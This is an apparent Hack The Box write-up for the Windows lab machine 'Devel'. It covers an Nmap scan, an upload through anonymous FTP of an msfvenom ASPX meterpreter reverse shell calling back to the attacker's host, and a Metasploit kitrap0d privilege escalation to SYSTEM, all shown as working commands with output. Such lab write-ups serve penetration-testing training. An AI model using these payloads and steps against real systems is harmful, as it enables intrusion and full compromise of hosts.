Devel

OS: Windows, Difficulty: Easy, IP: 10.10.10.5

Initial Enumeration

# Nmap 7.70 scan initiated Sat Jul  6 15:29:35 2019 as: nmap -p 21,80 -sV -sC -O -A -oN O-Detailed 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.24s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   237.33 ms 10.10.14.1
2   237.55 ms 10.10.10.5

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul  6 15:29:54 2019 -- 1 IP address (1 host up) scanned in 19.17 seconds

We have anonymous FTP and a web-server. It turns out the FTP access is the root directory of the Web-Server hence we can upload our reverse ASPX shell directly via FTP and get a shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f aspx > shell.aspx

msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.7
msf5 exploit(multi/handler) > set LPORT 9999
msf5 exploit(multi/handler) > exploit -j -z

[*] Started reverse TCP handler on 10.10.14.7:9999
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.7:9999 -> 10.10.10.5:49157) at 2019-07-06 16:10:19 +0530

Now we will use the local exploit suggester and use the XYZ exploit

meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated

msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)                                                     
   LHOST     10.10.14.7       yes       The listen address (an interface may be specified)                                                            
   LPORT     4444             yes       The listen port

PLEASE NOTE

Please make sure while running the exploit/windows/local/ms10_015_kitrap0d exploit the LHOST and LPORT options are correctly configured as by default the settings are not correct.

msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Launching notepad to host the exploit...
[+] Process 2548 launched.
[*] Reflectively injecting the exploit DLL into 2548...
[*] Injecting exploit into 2548 ...
[*] Exploit injected. Injecting payload into 2548...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 6 opened (10.10.14.7:4444 -> 10.10.10.5:49158) at 2019-07-06 16:10:54 +0530

meterpreter > shell
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\system

User Own

C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd***

Root Own

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a***

Learning Outcome

I was not aware of how to use metasploit sessions and that we can even use local exploit suggester, if we do not find any vulnerable information and the box is a little old. Additionally, sometimes exploit may be running fine but the LHOST and LPORT settings may be the problem. These were some key lessons while solving this box.